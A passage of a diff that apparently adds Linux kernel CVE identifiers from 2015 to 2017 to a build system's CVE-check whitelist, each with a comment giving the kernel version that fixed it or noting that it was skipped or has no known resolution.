+# fixed-version: Fixed after version 4.0rc7
+CVE_CHECK_WHITELIST += "CVE-2015-2922"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-2925"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2015-3212"
+
+# fixed-version: Fixed after version 2.6.33rc8
+CVE_CHECK_WHITELIST += "CVE-2015-3214"
+
+# fixed-version: Fixed after version 4.2rc2
+CVE_CHECK_WHITELIST += "CVE-2015-3288"
+
+# fixed-version: Fixed after version 4.2rc3
+CVE_CHECK_WHITELIST += "CVE-2015-3290"
+
+# fixed-version: Fixed after version 4.2rc3
+CVE_CHECK_WHITELIST += "CVE-2015-3291"
+
+# fixed-version: Fixed after version 4.0rc5
+CVE_CHECK_WHITELIST += "CVE-2015-3331"
+
+# Skipping CVE-2015-3332, no affected_versions
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-3339"
+
+# fixed-version: Fixed after version 4.1rc2
+CVE_CHECK_WHITELIST += "CVE-2015-3636"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-4001"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-4002"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-4003"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4004"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4036"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4167"
+
+# fixed-version: Fixed after version 3.13rc5
+CVE_CHECK_WHITELIST += "CVE-2015-4170"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4176"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4177"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4178"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4692"
+
+# fixed-version: Fixed after version 4.1rc6
+CVE_CHECK_WHITELIST += "CVE-2015-4700"
+
+# fixed-version: Fixed after version 4.2rc7
+CVE_CHECK_WHITELIST += "CVE-2015-5156"
+
+# fixed-version: Fixed after version 4.2rc3
+CVE_CHECK_WHITELIST += "CVE-2015-5157"
+
+# fixed-version: Fixed after version 4.3rc3
+CVE_CHECK_WHITELIST += "CVE-2015-5257"
+
+# fixed-version: Fixed after version 4.3rc3
+CVE_CHECK_WHITELIST += "CVE-2015-5283"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-5307"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-5327"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-5364"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-5366"
+
+# fixed-version: Fixed after version 4.2rc6
+CVE_CHECK_WHITELIST += "CVE-2015-5697"
+
+# fixed-version: Fixed after version 4.1rc3
+CVE_CHECK_WHITELIST += "CVE-2015-5706"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-5707"
+
+# fixed-version: Fixed after version 4.2rc5
+CVE_CHECK_WHITELIST += "CVE-2015-6252"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-6526"
+
+# CVE-2015-6619 has no known resolution
+
+# CVE-2015-6646 has no known resolution
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-6937"
+
+# Skipping CVE-2015-7312, no affected_versions
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2015-7509"
+
+# fixed-version: Fixed after version 4.4rc7
+CVE_CHECK_WHITELIST += "CVE-2015-7513"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-7515"
+
+# fixed-version: Fixed after version 4.4rc8
+CVE_CHECK_WHITELIST += "CVE-2015-7550"
+
+# Skipping CVE-2015-7553, no affected_versions
+
+# fixed-version: Fixed after version 4.5rc2
+CVE_CHECK_WHITELIST += "CVE-2015-7566"
+
+# fixed-version: Fixed after version 4.3rc4
+CVE_CHECK_WHITELIST += "CVE-2015-7613"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-7799"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2015-7833"
+
+# Skipping CVE-2015-7837, no affected_versions
+
+# fixed-version: Fixed after version 4.3rc7
+CVE_CHECK_WHITELIST += "CVE-2015-7872"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-7884"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-7885"
+
+# fixed-version: Fixed after version 4.4rc4
+CVE_CHECK_WHITELIST += "CVE-2015-7990"
+
+# Skipping CVE-2015-8019, no affected_versions
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8104"
+
+# fixed-version: Fixed after version 4.0rc3
+CVE_CHECK_WHITELIST += "CVE-2015-8215"
+
+# fixed-version: Fixed after version 2.6.34rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8324"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8374"
+
+# fixed-version: Fixed after version 4.4rc3
+CVE_CHECK_WHITELIST += "CVE-2015-8539"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8543"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8550"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8551"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8552"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8553"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8569"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8575"
+
+# fixed-version: Fixed after version 4.4rc4
+CVE_CHECK_WHITELIST += "CVE-2015-8660"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8709"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8746"
+
+# fixed-version: Fixed after version 4.3rc4
+CVE_CHECK_WHITELIST += "CVE-2015-8767"
+
+# fixed-version: Fixed after version 4.4rc5
+CVE_CHECK_WHITELIST += "CVE-2015-8785"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8787"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8812"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8816"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8830"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8839"
+
+# fixed-version: Fixed after version 4.4rc3
+CVE_CHECK_WHITELIST += "CVE-2015-8844"
+
+# fixed-version: Fixed after version 4.4rc3
+CVE_CHECK_WHITELIST += "CVE-2015-8845"
+
+# Skipping CVE-2015-8937, no affected_versions
+
+# Skipping CVE-2015-8938, no affected_versions
+
+# Skipping CVE-2015-8939, no affected_versions
+
+# Skipping CVE-2015-8940, no affected_versions
+
+# Skipping CVE-2015-8941, no affected_versions
+
+# Skipping CVE-2015-8942, no affected_versions
+
+# Skipping CVE-2015-8943, no affected_versions
+
+# Skipping CVE-2015-8944, no affected_versions
+
+# fixed-version: Fixed after version 4.1rc2
+CVE_CHECK_WHITELIST += "CVE-2015-8950"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8952"
+
+# fixed-version: Fixed after version 4.3
+CVE_CHECK_WHITELIST += "CVE-2015-8953"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8955"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8956"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8961"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8962"
+
+# fixed-version: Fixed after version 4.4
+CVE_CHECK_WHITELIST += "CVE-2015-8963"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8964"
+
+# fixed-version: Fixed after version 4.4rc8
+CVE_CHECK_WHITELIST += "CVE-2015-8966"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8967"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8970"
+
+# fixed-version: Fixed after version 3.19rc7
+CVE_CHECK_WHITELIST += "CVE-2015-9004"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-9016"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2015-9289"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-0617"
+
+# fixed-version: Fixed after version 4.5rc2
+CVE_CHECK_WHITELIST += "CVE-2016-0723"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-0728"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-0758"
+
+# Skipping CVE-2016-0774, no affected_versions
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2016-0821"
+
+# fixed-version: Fixed after version 4.0rc5
+CVE_CHECK_WHITELIST += "CVE-2016-0823"
+
+# fixed-version: Fixed after version 4.8rc7
+CVE_CHECK_WHITELIST += "CVE-2016-10044"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10088"
+
+# fixed-version: Fixed after version 4.9
+CVE_CHECK_WHITELIST += "CVE-2016-10147"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-10150"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10153"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10154"
+
+# fixed-version: Fixed after version 4.9rc7
+CVE_CHECK_WHITELIST += "CVE-2016-10200"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10208"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10229"
+
+# fixed-version: Fixed after version 4.8rc6
+CVE_CHECK_WHITELIST += "CVE-2016-10318"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10723"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10741"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10764"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10905"
+
+# fixed-version: Fixed after version 4.5rc6
+CVE_CHECK_WHITELIST += "CVE-2016-10906"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10907"
+
+# fixed-version: Fixed after version 4.7rc5
+CVE_CHECK_WHITELIST += "CVE-2016-1237"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-1575"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-1576"
+
+# fixed-version: Fixed after version 4.7rc3
+CVE_CHECK_WHITELIST += "CVE-2016-1583"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2053"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2069"
+
+# fixed-version: Fixed after version 4.4
+CVE_CHECK_WHITELIST += "CVE-2016-2070"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2016-2085"
+
+# fixed-version: Fixed after version 4.6rc5
+CVE_CHECK_WHITELIST += "CVE-2016-2117"
+
+# fixed-version: Fixed after version 4.5
+CVE_CHECK_WHITELIST += "CVE-2016-2143"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2184"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2185"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2186"
+
+# fixed-version: Fixed after version 4.6rc5
+CVE_CHECK_WHITELIST += "CVE-2016-2187"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2016-2188"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2016-2383"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2016-2384"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2543"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2544"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2545"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2546"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2547"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2548"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2549"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2016-2550"
+
+# fixed-version: Fixed after version 4.5rc2
+CVE_CHECK_WHITELIST += "CVE-2016-2782"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2847"
+
+# Skipping CVE-2016-2853, no affected_versions
+
+# Skipping CVE-2016-2854, no affected_versions
+
+# fixed-version: Fixed after version 4.5
+CVE_CHECK_WHITELIST += "CVE-2016-3044"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3070"
+
+# fixed-version: Fixed after version 4.6rc2
+CVE_CHECK_WHITELIST += "CVE-2016-3134"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3135"
+
+# fixed-version: Fixed after version 4.6rc3
+CVE_CHECK_WHITELIST += "CVE-2016-3136"
+
+# fixed-version: Fixed after version 4.6rc3
+CVE_CHECK_WHITELIST += "CVE-2016-3137"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3138"
+
+# fixed-version: Fixed after version 3.17rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3139"
+
+# fixed-version: Fixed after version 4.6rc3
+CVE_CHECK_WHITELIST += "CVE-2016-3140"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3156"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3157"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3672"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3689"
+
+# Skipping CVE-2016-3695, no affected_versions
+
+# Skipping CVE-2016-3699, no affected_versions
+
+# Skipping CVE-2016-3707, no affected_versions
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3713"
+
+# CVE-2016-3775 has no known resolution
+
+# CVE-2016-3802 has no known resolution
+
+# CVE-2016-3803 has no known resolution
+
+# fixed-version: Fixed after version 4.4rc4
+CVE_CHECK_WHITELIST += "CVE-2016-3841"
+
+# fixed-version: Fixed after version 4.8rc2
+CVE_CHECK_WHITELIST += "CVE-2016-3857"
+
+# fixed-version: Fixed after version 4.5
+CVE_CHECK_WHITELIST += "CVE-2016-3951"
+
+# fixed-version: Fixed after version 4.6rc3
+CVE_CHECK_WHITELIST += "CVE-2016-3955"
+
+# fixed-version: Fixed after version 4.6rc5
+CVE_CHECK_WHITELIST += "CVE-2016-3961"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4440"
+
+# fixed-version: Fixed after version 4.7rc4
+CVE_CHECK_WHITELIST += "CVE-2016-4470"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4482"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-4485"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-4486"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2016-4557"
+
+# fixed-version: Fixed after version 4.6rc7
+CVE_CHECK_WHITELIST += "CVE-2016-4558"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2016-4565"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2016-4568"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4569"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4578"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-4580"
+
+# fixed-version: Fixed after version 4.6rc7
+CVE_CHECK_WHITELIST += "CVE-2016-4581"
+
+# fixed-version: Fixed after version 4.7rc4
+CVE_CHECK_WHITELIST += "CVE-2016-4794"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4805"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-4913"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4951"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4997"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4998"
+
+# fixed-version: Fixed after version 4.9rc2
+CVE_CHECK_WHITELIST += "CVE-2016-5195"
+
+# fixed-version: Fixed after version 4.7rc3
+CVE_CHECK_WHITELIST += "CVE-2016-5243"
+
+# fixed-version: Fixed after version 4.7rc3
+CVE_CHECK_WHITELIST += "CVE-2016-5244"
+
+# Skipping CVE-2016-5340, no affected_versions
+
+# Skipping CVE-2016-5342, no affected_versions
+
+# Skipping CVE-2016-5343, no affected_versions
+
+# Skipping CVE-2016-5344, no affected_versions
+
+# fixed-version: Fixed after version 4.7
+CVE_CHECK_WHITELIST += "CVE-2016-5400"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-5412"
+
+# fixed-version: Fixed after version 4.7
+CVE_CHECK_WHITELIST += "CVE-2016-5696"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-5728"
+
+# fixed-version: Fixed after version 4.7rc6
+CVE_CHECK_WHITELIST += "CVE-2016-5828"
+
+# fixed-version: Fixed after version 4.7rc5
+CVE_CHECK_WHITELIST += "CVE-2016-5829"
+
+# CVE-2016-5870 has no known resolution
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2016-6130"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6136"
+
+# fixed-version: Fixed after version 4.7rc7
+CVE_CHECK_WHITELIST += "CVE-2016-6156"
+
+# fixed-version: Fixed after version 4.7
+CVE_CHECK_WHITELIST += "CVE-2016-6162"
+
+# fixed-version: Fixed after version 4.7rc7
+CVE_CHECK_WHITELIST += "CVE-2016-6187"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6197"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-6198"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6213"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6327"
+
+# fixed-version: Fixed after version 4.8rc3
+CVE_CHECK_WHITELIST += "CVE-2016-6480"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6516"
+
+# Skipping CVE-2016-6753, no affected_versions
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6786"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6787"
+
+# fixed-version: Fixed after version 4.8rc5
+CVE_CHECK_WHITELIST += "CVE-2016-6828"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-7039"
+
+# fixed-version: Fixed after version 4.9rc3
+CVE_CHECK_WHITELIST += "CVE-2016-7042"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7097"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7117"
+
+# Skipping CVE-2016-7118, no affected_versions
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7425"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7910"
+
+# fixed-version: Fixed after version 4.7rc7
+CVE_CHECK_WHITELIST += "CVE-2016-7911"
+
+# fixed-version: Fixed after version 4.6rc5
+CVE_CHECK_WHITELIST += "CVE-2016-7912"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7913"
+
+# fixed-version: Fixed after version 4.6rc4
+CVE_CHECK_WHITELIST += "CVE-2016-7914"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-7915"
+
+# fixed-version: Fixed after version 4.6rc7
+CVE_CHECK_WHITELIST += "CVE-2016-7916"
+
+# fixed-version: Fixed after version 4.5rc6
+CVE_CHECK_WHITELIST += "CVE-2016-7917"
+
+# fixed-version: Fixed after version 4.9
+CVE_CHECK_WHITELIST += "CVE-2016-8399"
+
+# Skipping CVE-2016-8401, no affected_versions
+
+# Skipping CVE-2016-8402, no affected_versions
+
+# Skipping CVE-2016-8403, no affected_versions
+
+# Skipping CVE-2016-8404, no affected_versions
+
+# fixed-version: Fixed after version 4.10rc6
+CVE_CHECK_WHITELIST += "CVE-2016-8405"
+
+# Skipping CVE-2016-8406, no affected_versions
+
+# Skipping CVE-2016-8407, no affected_versions
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-8630"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-8632"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-8633"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2016-8636"
+
+# fixed-version: Fixed after version 4.9rc6
+CVE_CHECK_WHITELIST += "CVE-2016-8645"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2016-8646"
+
+# fixed-version: Fixed after version 4.9rc7
+CVE_CHECK_WHITELIST += "CVE-2016-8650"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-8655"
+
+# fixed-version: Fixed after version 4.8rc7
+CVE_CHECK_WHITELIST += "CVE-2016-8658"
+
+# CVE-2016-8660 has no known resolution
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-8666"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-9083"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-9084"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9120"
+
+# fixed-version: Fixed after version 4.8rc7
+CVE_CHECK_WHITELIST += "CVE-2016-9178"
+
+# fixed-version: Fixed after version 4.10rc4
+CVE_CHECK_WHITELIST += "CVE-2016-9191"
+
+# fixed-version: Fixed after version 4.9rc3
+CVE_CHECK_WHITELIST += "CVE-2016-9313"
+
+# fixed-version: Fixed after version 4.9rc4
+CVE_CHECK_WHITELIST += "CVE-2016-9555"
+
+# fixed-version: Fixed after version 4.9
+CVE_CHECK_WHITELIST += "CVE-2016-9576"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9588"
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2016-9604"
+
+# Skipping CVE-2016-9644, no affected_versions
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9685"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9754"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-9755"
+
+# fixed-version: Fixed after version 4.9rc7
+CVE_CHECK_WHITELIST += "CVE-2016-9756"
+
+# fixed-version: Fixed after version 4.9rc7
+CVE_CHECK_WHITELIST += "CVE-2016-9777"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-9793"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9794"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-9806"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-9919"
+
+# Skipping CVE-2017-0403, no affected_versions
+
+# Skipping CVE-2017-0404, no affected_versions
+
+# Skipping CVE-2017-0426, no affected_versions
+
+# Skipping CVE-2017-0427, no affected_versions
+
+# CVE-2017-0507 has no known resolution
+
+# CVE-2017-0508 has no known resolution
+
+# Skipping CVE-2017-0510, no affected_versions
+
+# Skipping CVE-2017-0528, no affected_versions
+
+# Skipping CVE-2017-0537, no affected_versions
+
+# CVE-2017-0564 has no known resolution
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-0605"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-0627"
+
+# CVE-2017-0630 has no known resolution
+
+# CVE-2017-0749 has no known resolution
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2017-0750"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2017-0786"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2017-0861"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000111"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000112"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000251"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000252"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000253"
+
+# fixed-version: Fixed after version 4.14rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000255"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-1000363"
+
+# fixed-version: Fixed after version 4.12rc6
+CVE_CHECK_WHITELIST += "CVE-2017-1000364"
+
+# fixed-version: Fixed after version 4.12rc7
+CVE_CHECK_WHITELIST += "CVE-2017-1000365"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000370"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-1000371"
+
+# fixed-version: Fixed after version 4.12rc6
+CVE_CHECK_WHITELIST += "CVE-2017-1000379"
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-1000380"
+
+# fixed-version: Fixed after version 4.15rc2
